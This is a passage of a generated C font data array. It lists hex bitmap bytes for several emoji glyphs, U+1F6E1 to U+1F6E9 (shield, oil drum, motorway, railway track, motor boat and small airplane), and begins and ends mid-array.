0x0, 0x0, 0x1c, 0xf, 0x0, 0xf, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x1c, 0x3c, 0x0, 0xf, 0x7,
0x0, 0x0, 0x0, 0x0, 0x18, 0xf0, 0x0, 0xf,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0,
/* U+1F6E1 "🛡" */
0x0, 0x0, 0x0, 0x30, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x7e,
0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x3f, 0x0,
0x0, 0x0, 0x0, 0xfe, 0x0, 0x1f, 0xe0, 0x0,
0x0, 0x7f, 0xe0, 0x0, 0x7, 0xfe, 0x0, 0xff,
0xfe, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x60, 0x0, 0x3f, 0xff, 0xc0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0xff, 0x0, 0x0, 0xf, 0xf8,
0x0, 0x0, 0x7e, 0x0, 0x0, 0xf9, 0xfc, 0x0,
0x0, 0xfc, 0x0, 0xf, 0xc3, 0xff, 0x0, 0x1,
0xf8, 0x3, 0xfe, 0x7, 0xff, 0xf0, 0x3, 0xf0,
0x7f, 0xe0, 0xf, 0xff, 0xfe, 0x7, 0xe0, 0xf8,
0x0, 0x1f, 0xff, 0xfc, 0xf, 0xc1, 0x80, 0x0,
0x3f, 0xff, 0xf8, 0x1f, 0x83, 0x0, 0x0, 0x7f,
0xff, 0xf0, 0x3f, 0x6, 0x0, 0x0, 0xff, 0xff,
0xe0, 0x7e, 0xc, 0x0, 0x1, 0xff, 0xff, 0xc0,
0xee, 0x18, 0x0, 0x3, 0xff, 0xff, 0x83, 0x9c,
0x30, 0x0, 0x7, 0xff, 0xff, 0x7, 0x38, 0x60,
0x0, 0xf, 0xff, 0xfe, 0xe, 0x70, 0x40, 0x0,
0x1f, 0xff, 0xf8, 0x1c, 0xe0, 0xc0, 0x0, 0x3f,
0xff, 0xf0, 0x39, 0xc1, 0x80, 0x0, 0x7f, 0xff,
0xe0, 0x73, 0x83, 0x0, 0x0, 0xff, 0xff, 0xc0,
0xe3, 0x86, 0x0, 0x1, 0xff, 0xff, 0x83, 0x87,
0xc, 0x0, 0x3, 0xff, 0xff, 0x7, 0xe, 0x8,
0x0, 0x7, 0xff, 0xfc, 0xe, 0x1c, 0x18, 0x0,
0xf, 0xff, 0xf8, 0x1c, 0x18, 0x30, 0x0, 0x1f,
0xff, 0xf0, 0x70, 0x38, 0x60, 0x0, 0x3f, 0xff,
0xe0, 0xe0, 0x70, 0x60, 0x0, 0x7f, 0xff, 0x81,
0xc0, 0xe0, 0xc0, 0x0, 0xff, 0xff, 0x3, 0x80,
0xe1, 0x80, 0x1, 0xff, 0xfe, 0xe, 0x1, 0xc1,
0x80, 0x3, 0xff, 0xf8, 0x1c, 0x3, 0x83, 0x0,
0x7, 0xff, 0xf0, 0x38, 0x3, 0x86, 0x0, 0xf,
0xff, 0xe0, 0xe0, 0x7, 0x6, 0x0, 0x1f, 0xff,
0x81, 0xc0, 0xe, 0xc, 0x0, 0x3f, 0xff, 0x3,
0x80, 0xe, 0xc, 0x0, 0x7f, 0xfc, 0xe, 0x0,
0x1c, 0x1c, 0x0, 0xff, 0xf8, 0x1c, 0x0, 0x1c,
0x18, 0x1, 0xff, 0xe0, 0x70, 0x0, 0x38, 0x38,
0x3, 0xff, 0x80, 0xe0, 0x0, 0x38, 0x38, 0x7,
0xff, 0x3, 0x80, 0x0, 0x70, 0x30, 0xf, 0xfc,
0x7, 0x0, 0x0, 0x70, 0x30, 0x1f, 0xf0, 0x1c,
0x0, 0x0, 0x70, 0x70, 0x3f, 0xe0, 0x70, 0x0,
0x0, 0xe0, 0x70, 0x7f, 0x80, 0xe0, 0x0, 0x0,
0xe0, 0x78, 0xfe, 0x3, 0x80, 0x0, 0x0, 0xe0,
0x79, 0xf8, 0xe, 0x0, 0x0, 0x1, 0xe0, 0x3f,
0xc0, 0x3c, 0x0, 0x0, 0x1, 0xe0, 0x3f, 0x0,
0xf0, 0x0, 0x0, 0x1, 0xe0, 0x18, 0x3, 0xc0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0,
/* U+1F6E2 "🛢" */
0x0, 0x1, 0xff, 0xfc, 0x0, 0x0, 0x1, 0xff,
0xff, 0xff, 0x0, 0x0, 0x7f, 0xc0, 0x1, 0xff,
0x0, 0xf, 0xc0, 0x0, 0x0, 0x7e, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x7c, 0x1e, 0x0, 0x0, 0x0,
0x0, 0xf1, 0xe0, 0x7e, 0x0, 0x0, 0x3, 0xce,
0x3, 0xf0, 0x0, 0x0, 0xe, 0xe0, 0x1f, 0x80,
0xf, 0x80, 0x3f, 0x0, 0x0, 0x0, 0xfe, 0x1,
0xf8, 0x0, 0x0, 0x7, 0xf0, 0xf, 0xe0, 0x0,
0x0, 0x1f, 0x0, 0xf7, 0x80, 0x0, 0x0, 0x0,
0xf, 0x3e, 0x0, 0x0, 0x0, 0x0, 0xf9, 0xfc,
0x0, 0x0, 0x0, 0x1f, 0xcf, 0xfc, 0x0, 0x0,
0x7, 0xfe, 0x73, 0xff, 0x0, 0x7, 0xff, 0xf3,
0x83, 0xff, 0xff, 0xff, 0xff, 0x9c, 0x3, 0xff,
0xff, 0xff, 0xfc, 0xe0, 0x0, 0xe, 0x3f, 0xff,
0xe7, 0x0, 0x0, 0x0, 0xff, 0xff, 0x38, 0x0,
0x0, 0x7, 0xff, 0xfb, 0xc0, 0x0, 0x0, 0x3f,
0xff, 0xfc, 0x0, 0x0, 0x1, 0xff, 0xe7, 0xe0,
0x0, 0x0, 0xf, 0xfe, 0x3f, 0x0, 0x0, 0x0,
0x7f, 0xe1, 0xfc, 0x0, 0x0, 0x3, 0xfc, 0x1e,
0xe0, 0x0, 0x0, 0xf, 0x1, 0xe7, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x38, 0x0, 0x0, 0x0, 0x3,
0xf9, 0xc0, 0x0, 0x0, 0x0, 0x7f, 0xce, 0x0,
0x0, 0x0, 0x1f, 0xfe, 0x70, 0x0, 0x0, 0x1f,
0xff, 0xf3, 0x80, 0x7, 0xff, 0xff, 0xff, 0x9c,
0x0, 0x3f, 0xff, 0xff, 0xfc, 0xe0, 0x0, 0x0,
0x3f, 0xff, 0xe7, 0x0, 0x0, 0x0, 0xff, 0xff,
0x78, 0x0, 0x0, 0x7, 0xff, 0xdf, 0x80, 0x0,
0x0, 0x3f, 0xfc, 0xfc, 0x0, 0x0, 0x1, 0xff,
0xc7, 0xe0, 0x0, 0x0, 0xf, 0xfc, 0x3f, 0x80,
0x0, 0x0, 0x7f, 0x83, 0xdc, 0x0, 0x0, 0x3,
0xf0, 0x1c, 0xe0, 0x0, 0x0, 0x0, 0x1, 0xe7,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x38, 0x0, 0x0,
0x0, 0x3, 0xf9, 0xc0, 0x0, 0x0, 0x0, 0xff,
0xce, 0x0, 0x0, 0x0, 0x3f, 0xfe, 0x70, 0x0,
0x0, 0x1f, 0xff, 0xf3, 0x80, 0x7, 0xff, 0xff,
0xff, 0x9c, 0x0, 0x3f, 0xff, 0xff, 0xfc, 0xe0,
0x0, 0x0, 0x3f, 0xff, 0xef, 0x0, 0x0, 0x0,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x7, 0xff, 0xff,
0x80, 0x0, 0x0, 0x3f, 0xff, 0xfc, 0x0, 0x0,
0x1, 0xff, 0xff, 0xf0, 0x0, 0x0, 0xf, 0xff,
0xf3, 0xc0, 0x0, 0x0, 0x7f, 0xff, 0x8f, 0x0,
0x0, 0x3, 0xff, 0xf8, 0x3e, 0x0, 0x0, 0x1f,
0xff, 0x80, 0x7e, 0x0, 0x0, 0xff, 0xf0, 0x0,
0xff, 0x80, 0x3, 0xfe, 0x0, 0x0, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x3f, 0xff, 0x80, 0x0,
/* U+1F6E3 "🛣" */
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x39, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x3, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x1f, 0x80, 0x0, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x7, 0xe1, 0xff, 0xf8, 0x0, 0x0, 0x7,
0xff, 0xe1, 0xf8, 0x7f, 0xfe, 0x0, 0x0, 0x1,
0xff, 0xf8, 0x7e, 0x1f, 0xff, 0x87, 0x0, 0xfc,
0x7f, 0xfe, 0x1f, 0x81, 0xf0, 0xe1, 0xc0, 0x3f,
0x1c, 0x3e, 0x7, 0xe0, 0x7e, 0x38, 0x70, 0xf,
0xc7, 0x1f, 0x81, 0xf8, 0x1d, 0xce, 0x1c, 0x3,
0xf1, 0xce, 0xe0, 0x7e, 0x7, 0x3b, 0x82, 0x0,
0x0, 0x77, 0x38, 0x1f, 0x81, 0xc7, 0xe0, 0x0,
0x0, 0x1f, 0x8e, 0x7, 0xe0, 0x70, 0xf8, 0x20,
0x3, 0x7, 0xe3, 0x81, 0xf8, 0x1c, 0x3e, 0x8,
0x0, 0xc1, 0xf0, 0xe0, 0x7e, 0x7, 0x7, 0x8f,
0x80, 0xfc, 0x78, 0x38, 0x1f, 0x87, 0xff, 0xe1,
0xc0, 0x1e, 0x1f, 0xff, 0x87, 0xe1, 0xff, 0xf8,
0x20, 0x0, 0x7, 0xff, 0xe1, 0xf8, 0x1c, 0xe,
0x0, 0x0, 0x1, 0xc0, 0xe0, 0x7e, 0x7, 0x3,
0x80, 0x0, 0x0, 0x70, 0x38, 0x1f, 0x81, 0xc0,
0xff, 0xff, 0xff, 0xfc, 0xe, 0x7, 0xfc, 0x70,
0x3f, 0xff, 0xff, 0xff, 0x3, 0x9f, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xfe, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x1f, 0x81,
0xfe, 0x0, 0x0, 0x0, 0x1, 0xff, 0x7, 0xe8,
0x7f, 0xf0, 0x0, 0x0, 0x1, 0xff, 0x81, 0xfb,
0x1c, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0xe0, 0x7f,
0xd7, 0x9, 0xe0, 0x0, 0x0, 0xe0, 0x38, 0x3f,
0xf7, 0xce, 0x1c, 0x0, 0x0, 0x70, 0x3f, 0xff,
0xff, 0xf3, 0xc3, 0x80, 0x0, 0x38, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x81, 0xc0, 0x2, 0xcf, 0x99, 0x0, 0xe,
0x7, 0xe0, 0x70, 0x1, 0x33, 0xe6, 0x20, 0x3,
0x81, 0xf8, 0x1c, 0x0, 0xcc, 0xf9, 0xcc, 0x0,
0xe0, 0x7e, 0x7, 0x0, 0x27, 0xff, 0xf1, 0x0,
0x38, 0x1f, 0x81, 0xc0, 0x19, 0x9f, 0xce, 0x60,
0xe, 0x7, 0xe0, 0x70, 0x4, 0xe7, 0xf3, 0x88,
0x3, 0x81, 0xf8, 0x1c, 0x3, 0x39, 0xfc, 0x73,
0x0, 0xe0, 0x7e, 0x0, 0x1, 0x8e, 0x7f, 0x1c,
0x60, 0x0, 0x1f, 0x80, 0x0, 0x67, 0xff, 0xff,
0x18, 0x0, 0x7, 0xe0, 0x0, 0x31, 0xff, 0xff,
0xe3, 0x0, 0x1, 0xf8, 0x0, 0x1c, 0xf3, 0xfe,
0x38, 0xe0, 0x0, 0x7e, 0x0, 0x6, 0x3c, 0xff,
0x8f, 0x18, 0x0, 0x1f, 0x80, 0x3, 0x8f, 0x3f,
0xe3, 0xc7, 0x0, 0x7, 0xe0, 0x0, 0xc7, 0x8f,
0xf8, 0xf8, 0xc0, 0x1, 0xf8, 0x0, 0x71, 0xe3,
0xfe, 0x1e, 0x38, 0x0, 0x7e, 0x0, 0x38, 0xf8,
0xff, 0x87, 0x87, 0x0, 0x1f, 0x80, 0xe, 0x3e,
0x7f, 0xf1, 0xf1, 0xc0, 0x7, 0xe0, 0x7, 0xf,
0xff, 0xff, 0xfc, 0x38, 0x1, 0xf8, 0x1, 0xc7,
0xff, 0xff, 0xff, 0x8e, 0x0, 0x7e, 0x0, 0xe1,
0xf1, 0xff, 0xc3, 0xe1, 0xc0, 0x1f, 0x80, 0x78,
0xfc, 0x7f, 0xf0, 0xfc, 0x78, 0x7, 0xe0, 0x1c,
0x3e, 0x1f, 0xfe, 0x1f, 0xe, 0x1, 0xf8, 0xf,
0x1f, 0x87, 0xff, 0x87, 0xc3, 0xc0, 0x7e, 0x3,
0x87, 0xe3, 0xff, 0xe1, 0xf8, 0x70, 0x1f, 0x81,
0xe1, 0xf8, 0xff, 0xf8, 0x7e, 0x1e, 0x7, 0x70,
0xf0, 0xfc, 0x3f, 0xff, 0xf, 0xc3, 0xc3, 0xdf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0,
/* U+1F6E4 "🛤" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x39, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfe, 0x7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0x80, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x39, 0xf8, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x7e, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x1f, 0x80, 0xf,
0x0, 0x0, 0x0, 0x0, 0xf, 0x7, 0xe0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x7, 0x81, 0xf8, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x3, 0x80, 0x7e, 0x0,
0x47, 0x80, 0x0, 0x0, 0x31, 0xc0, 0x1f, 0x80,
0x38, 0xf8, 0x0, 0x0, 0xc, 0xe0, 0x7, 0xe0,
0xe, 0xf, 0xc0, 0x0, 0x3f, 0xf0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x1f, 0x3, 0x6, 0x30, 0x67, 0xc0, 0x1,
0xfe, 0x7, 0xc1, 0xc1, 0x8c, 0x1d, 0xf0, 0x0,
0x7f, 0x99, 0xf0, 0xf3, 0xff, 0xe3, 0x80, 0x6,
0x1f, 0xf6, 0x0, 0x38, 0x30, 0x60, 0x70, 0x1,
0xc7, 0xff, 0x80, 0x1c, 0xc, 0x18, 0xc, 0x0,
0x71, 0xff, 0xf0, 0x6, 0x6, 0x3, 0x3, 0x81,
0x3c, 0x7f, 0xfc, 0x3, 0x8f, 0xff, 0xf8, 0x60,
0xef, 0x1f, 0xff, 0x0, 0xc7, 0xff, 0xff, 0x18,
0x3f, 0xe7, 0xff, 0xc0, 0x30, 0x30, 0x6, 0x7,
0xf, 0xf9, 0xff, 0xf8, 0x18, 0x1c, 0x1, 0xc0,
0xe7, 0xfe, 0x7f, 0xfe, 0xe, 0x7f, 0xff, 0xff,
0x1c, 0x1f, 0x9f, 0xff, 0x7, 0x3f, 0xff, 0xff,
0xe3, 0x83, 0xe7, 0xe0, 0x3, 0x8f, 0xff, 0xff,
0xf8, 0x70, 0x1, 0xf8, 0x0, 0xc0, 0x30, 0x0,
0x60, 0xc, 0x0, 0x7e, 0x0, 0x70, 0x1c, 0x0,
0x1c, 0x3, 0x0, 0x1f, 0x80, 0x18, 0x6, 0x0,
0x3, 0x0, 0xe0, 0x7, 0xe0, 0x6, 0x7f, 0xff,
0xff, 0xff, 0x18, 0x1, 0xf8, 0x1, 0x9f, 0xff,
0xff, 0xff, 0xe6, 0x0, 0x7e, 0x0, 0xcf, 0xff,
0xff, 0xff, 0xf9, 0xc0, 0x1f, 0x80, 0x33, 0xff,
0xff, 0xff, 0xfe, 0x30, 0x7, 0xe0, 0x1c, 0x6,
0x0, 0x0, 0x38, 0xe, 0x1, 0xf8, 0xe, 0x3,
0x80, 0x0, 0xe, 0x1, 0xc0, 0x7e, 0x7, 0x0,
0xe0, 0x0, 0x3, 0x80, 0x38, 0x1f, 0x83, 0x9f,
0xff, 0xff, 0xff, 0xff, 0xc7, 0x7, 0xe0, 0xcf,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xe1, 0xf8, 0x33,
0xff, 0xff, 0xff, 0xff, 0xff, 0x18, 0x7e, 0x18,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc6, 0x1f, 0x86,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xf1, 0x87, 0xe1,
0x80, 0x70, 0x0, 0x0, 0x7, 0x0, 0x61, 0xfc,
0x60, 0x1c, 0x0, 0x0, 0x1, 0xc0, 0x18, 0xf7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf9,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0,
/* U+1F6E5 "🛥" */
0x0, 0x0, 0x0, 0x0, 0x3f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x6, 0x30, 0xc4, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x63, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x6, 0x30, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x63, 0xc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0xe0, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x1e, 0x0, 0xf8,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x1, 0xc0,
0x6, 0x0, 0x0, 0xf, 0xff, 0x80, 0x0, 0x70,
0x1c, 0x40, 0x70, 0x0, 0x0, 0xff, 0xff, 0xf8,
0xe, 0x3, 0x8f, 0xc7, 0x0, 0x0, 0x3, 0x7,
0xff, 0x81, 0xc0, 0x38, 0xfc, 0x30, 0x0, 0x0,
0x30, 0x60, 0x78, 0x38, 0x7, 0x1f, 0xe3, 0x80,
0x0, 0x3, 0x6, 0x6, 0x3, 0x80, 0x71, 0xfc,
0x38, 0x0, 0x0, 0x38, 0x60, 0x60, 0x70, 0xe,
0x0, 0x1, 0x80, 0x0, 0x7, 0xff, 0xff, 0xff,
0xfe, 0xe0, 0x0, 0x1c, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x0, 0xc0, 0x0, 0x7,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xfe, 0xc, 0x0,
0x0, 0x30, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xe0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xc0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xc0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0x0, 0xf,
0xff, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0xf0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x7, 0xfe, 0x7, 0x0, 0x0, 0x0, 0xf, 0xff,
0xff, 0x80, 0x3f, 0xf0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xf3, 0xff, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xf0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xf0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0xf,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf8, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7f, 0x80, 0x0, 0x7, 0xff, 0xe0, 0x0,
0x0, 0x0, 0xe, 0x7c, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc7, 0xf0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x7f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F6E9 "🛩" */
0x2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xf0, 0x0, 0xfe, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x7, 0x1f, 0x80, 0x19, 0xe0,
0x7e, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x7c, 0x3,
0x9c, 0x1d, 0xf0, 0x0, 0x0, 0x0, 0x70, 0x3,
0xc0, 0x71, 0xc7, 0xf, 0x80, 0x0, 0x0, 0x1c,
0x0, 0x70, 0xe, 0x39, 0xc0, 0x7c, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x1, 0xc3, 0xf0, 0x7, 0x0,
0x0, 0x3, 0xc0, 0x3, 0x80, 0x18, 0x3c, 0x1,
0xc0, 0x0, 0x0, 0xf0, 0x0, 0xe0, 0x3, 0x7,
0x0, 0x78, 0x0, 0x0, 0x38, 0x0, 0x38, 0x0,
0x60, 0x70, 0x1e, 0x0, 0x0, 0xe, 0x0, 0xe,
0x0, 0xc, 0xe, 0x3, 0x80, 0x0, 0x3, 0x80,
0x1, 0xc0, 0x1, 0xc0, 0xe0, 0xe0, 0x0, 0x0,
0xe0, 0x0, 0x70, 0x0, 0x38, 0xf, 0xf8, 0x0,
0x0, 0x38, 0x0, 0x1c, 0x0, 0xf, 0x1, 0xff,
0xfe, 0x0, 0xe, 0x0, 0x7, 0x0, 0x3, 0xf8,
0x3, 0xff, 0xfc, 0x7, 0x80, 0x0, 0xe0, 0x0,
0x73, 0xc0, 0x0, 0x7f, 0xf1, 0xe0, 0x0, 0x38,
0x0, 0x1c, 0x3c, 0x0, 0x0, 0x7f, 0xf0, 0x0,
0xe, 0x0, 0x7, 0x3, 0xc0, 0x0, 0x0, 0xfe,
0x0, 0x3, 0x80, 0x1, 0xc0, 0x1c, 0x0, 0x0,
0x3, 0xf0, 0x0, 0x70, 0x0, 0x70, 0x1, 0xc0,
0x0, 0x0, 0x1f, 0x80, 0x1c, 0x0, 0x1c, 0x0,
0x7c, 0xc, 0x0, 0x0, 0xf8, 0x7, 0x0, 0x7,
0x0, 0x1f, 0xc1, 0xe0, 0x0, 0x7, 0x81, 0xc0,
0x0, 0xe0, 0xf, 0xbc, 0x3c, 0x80, 0x0, 0x78,
0x38, 0x0, 0x1f, 0x3, 0xc1, 0xc7, 0x9c, 0x0,
0xf, 0x8e, 0x0, 0x1, 0xf1, 0xf0, 0x1c, 0x33,
0xe0, 0x3, 0xfb, 0x80, 0x0, 0xf, 0xf8, 0x1,
0xc0, 0x7c, 0x0, 0xff, 0xe0, 0x0, 0x0, 0x7e,
0x0, 0x1e, 0xf, 0x9e, 0x3f, 0xfc, 0x0, 0x0,
0x7, 0x0, 0x1, 0xe0, 0x71, 0xe3, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x2, 0x3c, 0x7f,
0xfe, 0x0, 0x60, 0x0, 0x0, 0x1, 0xe0, 0x7,
0x87, 0xfb, 0xf0, 0x3c, 0x0, 0x0, 0x0, 0xe,
0x0, 0xf8, 0xfe, 0x1f, 0x7, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x7, 0xf, 0x81, 0xf1, 0xe0, 0x0,
0x0, 0x0, 0x1f, 0xc0, 0x21, 0xe0, 0xf, 0x78,
0x0, 0x0, 0x0, 0x7, 0xff, 0x0, 0x0, 0x0,
0xef, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xf8, 0x0,
0x0, 0x1f, 0xc0, 0x0, 0x0, 0x0, 0x38, 0x7,
0xc0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0xe,
0x0, 0x1e, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0xf0, 0x0, 0xf, 0x80, 0x0,
0x0, 0x0, 0xe0, 0x0, 0xf, 0x80, 0x3, 0xf0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x3, 0xfe, 0x0,
0x7e, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0xff,
0xf8, 0x1f, 0xc0, 0x0, 0x0, 0x1, 0x80, 0x0,
0x79, 0xc7, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x1e, 0x3c, 0x1f, 0xf0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x7, 0x8f, 0xc0, 0x1e, 0x0, 0x0,
0x0, 0x7, 0x0, 0x1, 0xe1, 0xf8, 0x7, 0x80,
0x0, 0x0, 0x1, 0xc0, 0x0, 0xf0, 0x3f, 0x1,
0xf0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x3c, 0x3,
